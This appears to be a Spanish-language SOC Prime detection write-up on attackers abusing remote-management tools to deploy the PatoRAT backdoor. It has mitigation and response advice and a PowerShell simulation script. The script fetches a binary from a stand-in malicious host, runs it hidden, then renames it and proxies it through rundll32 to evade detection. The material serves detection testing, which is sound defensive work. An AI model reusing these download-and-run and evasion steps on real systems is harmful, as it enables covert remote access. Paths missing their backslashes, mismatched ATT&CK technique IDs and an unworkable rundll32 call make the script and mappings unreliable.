SOC Prime Bias: Crítico

28 Jan 2026 08:41 UTC

Detección en el Endpoint de Casos Recientes de Distribución de RMM

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Detección en el Endpoint de Casos Recientes de Distribución de RMM
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están abusando cada vez más de herramientas legítimas de monitoreo y gestión remota (RMM)—como LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne y SuperOps—para distribuir malware y establecer acceso remoto persistente. La entrega inicial a menudo ocurre a través de páginas de descarga maliciosas o correos electrónicos de phishing, seguida por la ejecución a través de PowerShell y el despliegue de cargas secundarias como el backdoor PatoRAT. AhnLab EDR puede detectar la ejecución de estas utilidades RMM y generar alertas basadas en comportamiento relacionadas con actividades sospechosas subsecuentes. El informe subraya la importancia de validar la procedencia del software y mantener un monitoreo continuo del endpoint.

Investigación

El Centro de Inteligencia de Seguridad de AhnLab observó múltiples campañas en las que atacantes reempaquetaban o disfrazaban instaladores RMM como aplicaciones populares (por ejemplo, Notepad++, 7-Zip y Telegram) y las distribuían a través de sitios web maliciosos o archivos adjuntos de phishing. Tras la instalación, los agentes RMM se registraban en la infraestructura del proveedor y se usaban para ejecutar cargas de PowerShell que desplegaban PatoRAT. Se observaron tácticas similares en varios productos RMM, incluyendo Syncro entregado a través de phishing con anzuelos en PDF. Se desarrolló una lógica de detección AhnLab EDR para marcar la ejecución de estos binarios legítimos y correlacionarla con comportamientos post-instalación.

Mitigación

Verifique las fuentes de descarga, valide los certificados de firma de código y compare los hashes con las versiones oficiales del proveedor antes de permitir software RMM en el entorno. Implemente listas blancas de aplicaciones y requiera aprobaciones explícitas para la ejecución de RMM. Monitorice lanzamientos inesperados de binarios RMM, actividad anómala de PowerShell y conexiones sospechosas a dominios de infraestructura del proveedor cuando tales herramientas no estén autorizadas. Mantenga los sistemas operativos y herramientas de seguridad actualizadas para reducir la exposición.

Respuesta

Cuando se detecte una ejecución sospechosa de RMM, aisle el host, recopile artefactos forenses y elimine el binario no autorizado. Bloquee las conexiones salientes a la infraestructura de la herramienta para cortar los canales de control remoto, y realice un escaneo completo para cargas secundarias como PatoRAT. Actualice el contenido de detección con los IOC observados e informe al SOC sobre los patrones de la campaña para una triaje más rápida.

Flujo de Ataque

Ejecución de Simulación

Prerequisito: El Chequeo Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y narrativas DEBEN reflejar directamente los TTPs identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico incorrecto.

  • Narrativa de Ataque y Comandos:
    Un atacante entrega un correo electrónico de phishing que contiene un archivo adjunto malicioso. El archivo adjunto ejecuta un script de PowerShell que descarga el binario RMM LogMeIn.exe to C:Temp. Para evadir la detección basada en nombre, el atacante renombra el binario a tool.exe y lo lanza a través de rundll32.exe (T1216). El binario RMM luego contacta al servidor C2 controlado por el atacante y despliega una carga de backdoor. Después de la ejecución, el atacante elimina el binario (T1542.004) para cubrir las pistas.

  • Script de Prueba de Regresión:

    # ---------------------------------------------------------------
    # Simular explotación de herramienta RMM (nombre original) – debería activar
    # ---------------------------------------------------------------
    $rmmPath = "C:TempLogMeIn.exe"
    Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath
    Write-Host "[*] Ejecutando binario RMM original (se espera alerta)..."
    Start-Process -FilePath $rmmPath -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Simular evasión mediante el cambio de nombre y ejecución proxy – no debería activar
    # ---------------------------------------------------------------
    $evasionPath = "C:Temptool.exe"
    Rename-Item -Path $rmmPath -NewName "tool.exe"
    Write-Host "[*] Ejecutando binario RMM renombrado vía rundll32 (evasión)..."
    $rundll = "$env:SystemRootSystem32rundll32.exe"
    Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden
    Start-Sleep -Seconds 10
    
    # ---------------------------------------------------------------
    # Limpieza de artefactos
    # ---------------------------------------------------------------
    Write-Host "[*] Limpiando binarios..."
    Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Simulación completa."
  • Comandos de Limpieza:

    # Asegúrese de que cualquier proceso sobrante esté terminado
    Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Elimine cualquier archivo descargado (si todavía existe)
    Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue